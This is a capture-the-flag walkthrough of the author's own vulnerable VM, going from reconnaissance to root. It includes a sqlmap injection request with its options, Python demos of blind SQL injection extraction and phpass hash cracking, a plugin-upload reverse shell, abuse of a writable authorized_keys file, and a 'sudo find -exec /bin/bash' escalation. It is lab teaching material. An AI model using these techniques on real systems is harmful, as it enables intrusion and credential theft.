This was the first boot2root that I created and quite frankly, I had a blast creating it. I learned a lot from creating this VM. To be honest, creating something vulnerable and having it be 'solvable' takes a lot of time, trial and error and testing in order for it to be successful. Now, was this successful? It is yet to be seen, but within 12 hours of publishing the VM, someone on twitter took a screen cap of the root flag. I'd like to think it was successful :)
Now, I'm waiting to publish a walkthrough (at least how I envisioned this walkthrough) until more people have had a chance to attempt it.
But here is a sneak peek at how I envisioned this boot2root being solved:
I made this VM with a static IP address (192.168.9.184)
We first run nmap against this IP and discover 3 open ports:
We start with port 80 and are presented with the following red herring:
This page is nothing more than a SecKC image.
Let's look at port 8888:
Oh wow. Lots of information here. Let's check out the whole page:
SecKC: Kansas City's Hacker Hive

Kansas City! The city of fountains! Did you know the Chiefs won SUPER BOWL LIV?! Oh, and the Royals won THE WORLD SERIES in 2015?! Oh man, that's a lot of awesome. But did you know that Kansas City has the largest Monthly InfoSec meet-up? That's right! SecKC hosts the largest monthly meet-up EVERY. MONTH.

root@kali:/rapid7/metasploit-framework:master$ MSFLOGO="data/logos/haKCers.txt" ./msfconsole

(the haKCers ASCII-art banner, flattened into one line by extraction; its text fragments are kept verbatim:)
`:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣~~Destroy.No.Data~~s:` -+h2~~Maintain.No.Persistence~~h+- `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:` ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- -~/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.No.nano.o :is:TЯiKC.sudo-.A: :we're.all.alike'` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf:exploit -j. :Ns.BOB.ALICEes7: :---srwxrwx:-.` `MS146.52.No.Per: :.script..Ac816/ sENbove3101.404: :NT_AUTHORITY.Do `T:/shSYSTEM-.N: :09.14.2011.raid /STFU|wall.No.Pr: :hvensntSurb025N. dNVRGOING2GIVUUP: :#OUTHOUSE- -s: /corykennedyData: :$nmap -oS SSo.6178306Ence: :Awsm.da: /shMTl#beats3o.No.: :Ring0: `dDestRoyREXKC3ta/M: :23d: sSETEC.ASTRONOMYist: /- /yo- .ence.N:(){ :|: };: `:Shall.We.Play.A.Game?tron/ ```-ooy.if1ghtf0r+ehUser5` ..th3.H1V3.U2Vgeoda.jMh+.` `MjM~~WE.ARE.se~~MMjMs +~KANSAS.CITY's~-` J~HAKCERS~./.` .esc:wq!:` +++ATH`

=[ metasploit v5.0.61-dev-618a7c9771 ]
+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >

Destroy No Data. Maintain No Persistence. Above Else, Do No Harm.
Bob Bob Bob and Alice Alice Alice. Random Name.
Swag: Represent SecKC with swag!
CONTACT: seckc.org, Kansas City, USA. Email: info@seckc.org
Powered by HAKCERs
Lots of great information on SecKC and Kansas City (the msfconsole banner even hides a base64 string, dHJ5aGFyZGVyIQ==, which decodes to "tryharder!"). Let's run dirb to see if we can reach any other pages:
Hmm. Nothing. Let's run CeWL to build a wordlist from this page and see whether there are directories we've been missing because of the common.txt wordlist we've been using:
Alright, let's try dirb again, this time with our new wordlist:
Sweet! We found a new directory, "/SecKCTheWorld/". Let's check it out.
Oh, look at that.. a login and registration page! Let's register an account:
Now let's login:
Sweet. Looks like there's another tab, "Attention Members!". Let's look at it.
Looks like SecKC members can use Gift Vouchers for SWAG. Nice. Unfortunately, we can't get to it. Looks like "HAKCER" made the post and said that only super special members such as himself can access it. You know what? Let's see if we can hakc him!
We try logging in as hakcer with the password hakcer:
Ah-ha! We're logged in as hakcer. What a bad password. As hakcer we now have an additional menu entry, "Gift Voucher".
The page walks you through creating a gift voucher. We proxy the whole flow through Burp Suite, since a multi-step form like this is a likely place for a vulnerability.
After submitting the first stage of the gift voucher, our Burp history shows a POST to admin-ajax.php with two parameters, "action" and "template_id". To speed up discovery, a search of exploit-db shows that WordPress Plugin Gift Voucher 1.0.5 has a known SQL injection in exactly this request: https://www.exploit-db.com/exploits/45255
We save the POST request from Burp and hand it to sqlmap, replacing the template_id value with "*" to mark the injection point:
POST /SecKCTheWorld/wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.9.184:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.184:8888/SecKCTheWorld/index.php/gift-voucher/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Connection: close
Cookie: wordpress_ff07ddea9d328682b5f743aa9e2cfddd=hakcer%7C1594576785%7CwFPSArCyw5nXbsFdIFSrmvRYQ2i9s1AbwyfZGhaR4cd%7Cec080ddf7e4079de895120e152128f1aa3a4dac613153abcc2b6925df4c5f832; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ff07ddea9d328682b5f743aa9e2cfddd=hakcer%7C1594576785%7CwFPSArCyw5nXbsFdIFSrmvRYQ2i9s1AbwyfZGhaR4cd%7C9e99f7262caa50b25a14620fcb6fa1d60eddb1d23094354e7d1ec0ad7b7c7208

action=wpgv_doajax_front_template&template_id=*
Again, to speed up the test (we already know the backend and the technique from the exploit-db entry), we give sqlmap the following:
- --level 5
- --risk 3
- --technique B (boolean-based blind only)
- --dbms MySQL
- the template_id parameter as the target (the "*" in the saved request marks the same injection point)
We let sqlmap do its thing:
As shown above, we confirm that SQL Injection is present. Now, let's dump the database.
Since I wrote this box I already know where to look, so we skip enumerating every database and go straight to the table and columns we want:
- -D wordpress
- -T wp_users
- -C user_login,user_pass
- --dump
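What sqlmap is actually doing in the two steps above (the --technique B detection and the column dump) is easier to see on a small model. The following is an added Python example, not the Gift Voucher plugin's code and not sqlmap: an in-memory SQLite database stands in for MySQL, a constructed handler reproduces only the shape of the bug (a numeric template_id pasted into the query, with a true/false response), and a blind extraction routine recovers the admin's password hash one character at a time. The hardened handler beside it shows the fix. Table names follow the walkthrough; the hash value in the table is made up.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the injectable AJAX handler. This is NOT the Gift Voucher
# plugin's code: an in-memory SQLite database (instead of MySQL) with a wp_users-style
# table reproduces only the shape of the bug, an unescaped numeric parameter, so the
# blind technique sqlmap used can be run offline.
CONSTRUCTED_HASH_IN_DB = "$P$BNotARealHashJustForTheDemo"   # made up for the demo


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        CREATE TABLE wp_gift_templates (id INTEGER, name TEXT);
        INSERT INTO wp_gift_templates VALUES (1, 'Birthday'), (2, 'Thank you');
    """)
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (CONSTRUCTED_HASH_IN_DB,))
    return db


def front_template_vulnerable(db: sqlite3.Connection, template_id: str) -> bool:
    # The bug: template_id is pasted into the SQL text. The response only reveals whether
    # a template row came back (true/false), which is all a boolean-based blind attack needs.
    sql = "SELECT name FROM wp_gift_templates WHERE id = " + template_id
    return db.execute(sql).fetchone() is not None


def front_template_fixed(db: sqlite3.Connection, template_id: str) -> bool:
    # The fix: coerce to an integer and bind it ($wpdb->prepare() with %d, or absint(),
    # in WordPress), so the value can never change the statement's structure.
    row = db.execute("SELECT name FROM wp_gift_templates WHERE id = ?",
                     (int(template_id),)).fetchone()
    return row is not None


def looks_injectable(handler: Callable[[sqlite3.Connection, str], bool],
                     db: sqlite3.Connection) -> bool:
    # sqlmap's boolean-based check (--technique B): a true and a false condition appended
    # to the same base value must produce different responses.
    try:
        return handler(db, "1 AND 1=1") != handler(db, "1 AND 1=2")
    except ValueError:          # the hardened handler rejects non-numeric input outright
        return False


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    # Recover the string `subquery` returns one character at a time, binary-searching each
    # code point with yes/no answers only. MySQL uses ORD()/ASCII() where SQLite uses
    # unicode(); sqlmap emits the dialect for the --dbms you give it.
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:             # substr() past the end is '', unicode('') is NULL: string finished
            break
        out += chr(lo)
    return out


def dump_admin_hash(db: sqlite3.Connection) -> str:
    # One cell of what "-D wordpress -T wp_users -C user_login,user_pass --dump" retrieves,
    # using the vulnerable handler as the true/false oracle.
    def oracle(payload: str) -> bool:
        return front_template_vulnerable(db, payload)
    return blind_extract(oracle, "SELECT user_pass FROM wp_users WHERE user_login = 'admin'")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", looks_injectable(front_template_vulnerable, db))
    print("fixed handler injectable:", looks_injectable(front_template_fixed, db))
    print("leaked admin hash:", dump_admin_hash(db))
```

Each character costs about seven requests with the binary search, which is why a full dump of wp_users takes sqlmap a few hundred requests rather than a handful; --level and --risk only change how many payload shapes it tries first, not this per-character cost.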
Looks like we have an admin hash! We already know hakcer's password, and geoda is our own. Let's see if we can crack this hash!
We feed only the hash (no username) to John the Ripper with the rockyou wordlist; John recognises the $P$ prefix as a WordPress phpass hash on its own.
After JTR is complete, we see that the password for admin is "abc123". Let's log into wordpress as the admin user now.
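To show what John is cracking here, the following is an added Python example (not WordPress's, phpass's or John's code) that implements the portable phpass scheme behind a $P$ hash: an 8-character salt, a cost character, and MD5 iterated 2^cost times. It builds a constructed hash of abc123 with an assumed salt and cracks it against a small inline wordlist standing in for rockyou.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# phpass "portable" hashes, the $P$ scheme behind the wp_users.user_pass column.
# Added example, not WordPress's or John's code; the salt used below is an assumption.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes) -> str:
    # phpass's own base64 variant: little-endian 6-bit groups, no padding.
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    # Layout: "$P$" + ITOA64[log2(iterations)] + 8-char salt + 22-char encoded MD5.
    # WordPress writes "$P$B": ITOA64[13] == "B", i.e. 2**13 = 8192 MD5 rounds.
    if len(salt) != 8 or not 7 <= count_log2 <= 30:
        raise ValueError("bad salt or cost")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + _encode64(digest)


def phpass_verify(password: str, stored: str) -> bool:
    # Recompute with the salt and cost carried in the hash itself, then compare the digest part.
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    candidate = phpass_hash(password, stored[4:12], count_log2)
    return hmac.compare_digest(candidate[12:], stored[12:])


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    # What John does with the rockyou wordlist, minus the speed: one salted 8192-round
    # MD5 chain per guess, and nothing to precompute because of the per-user salt.
    for word in wordlist:
        if phpass_verify(word, stored):
            return word
    return None


# Constructed hash of the password the walkthrough recovered, with an assumed salt.
CONSTRUCTED_ADMIN_HASH = phpass_hash("abc123", "Wq3hTz9L")
SMALL_WORDLIST = ["123456", "password", "iloveyou", "abc123", "letmein"]   # stand-in for rockyou

if __name__ == "__main__":
    print(CONSTRUCTED_ADMIN_HASH)
    print("cracked:", crack(CONSTRUCTED_ADMIN_HASH, SMALL_WORDLIST))
```

The cost is what makes this slow for real wordlists (8192 MD5 calls per guess) and the salt is what stops rainbow tables, but neither helps a password like abc123 that sits near the top of rockyou.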
Excellent. Now that we are logged in as admin, let's upload a reverse shell through the plugin uploader. We first create the reverse shell PHP file:
Next, we zip the file
Upload the shell.zip as a plugin:
And install
After starting our netcat listener on port 4444, we activate the plugin
Boom. We now have a shell on the system as www-data
To speed things up, we find a backup file owned by the user chiefs
We look inside the file
We find the username and password for the user chiefs. We now can ssh directly to the system as the chiefs user
Now that we have direct access as a valid user, we continue our enumeration.
We notice above that inside /home/royals, our user chiefs (through the chiefs group) can write to the royals user's .ssh/authorized_keys file.
How can we exploit this? We generate an SSH key pair on our attacker machine, append the public key to that authorized_keys file, and SSH in as royals with the matching private key. Let's see how this is done.
For simplicity's sake and for educational purposes, we just use ssh-keygen to generate a key pair:
As you can see, we have both a private key '/home/kali/.ssh/id_rsa' and a public key '/home/kali/.ssh/id_rsa.pub'
We copy the contents of the public key into the authorized_keys file, as shown below:
The above shows our id_rsa.pub key. The below shows it inside the authorized_keys file on the victim machine
Now, with everything set up, we can ssh in as the royals user with our private key. (One caveat for other targets: sshd's StrictModes setting, on by default, ignores an authorized_keys file or ~/.ssh directory that is writable by anyone other than its owner, so this trick only works where that check is off or the permissions still pass it, as they do here.)
Success. We are now running as the royals user
We continue enumeration, looking for a way to elevate further. We speed this up since I already know what I'm looking for.
We notice above that, checking the sudo rights for this user, royals can run /usr/bin/find as root without a password.
find's -exec runs its command once for every matching path, so "sudo find / -exec /bin/bash \;" hands us a root shell at the first match (if we exit that shell, find simply starts another one for the next path; "sudo find . -exec /bin/bash \; -quit" avoids that). We exploit it as follows:
Sweet! We are now running as root! Let's grab the flag!
royals@seckc:~$ whoami
royals
royals@seckc:~$ sudo find / -exec /bin/bash \;
root@seckc:~# whoami
root
root@seckc:~# id
uid=0(root) gid=0(root) groups=0(root)
root@seckc:~# cd /root
root@seckc:/root# ls
flag.txt
root@seckc:/root# cat flag.txt
(SecKC ASCII-art banner, flattened by extraction and not reproduced here)
Woot!! Congratulations on solving the challenge! If you are interested in learning more about SecKC, visit us at seckc.org or join our #Slack channel: http://slack.seckc.org
Created by: Eric "geoda" Guillen
And that's it! I hope you enjoyed this boot2root intentionally vulnerable virtual machine. I certainly enjoyed building it and I'm sure I'll build more in the future. Please reach out with any questions.
Till next time!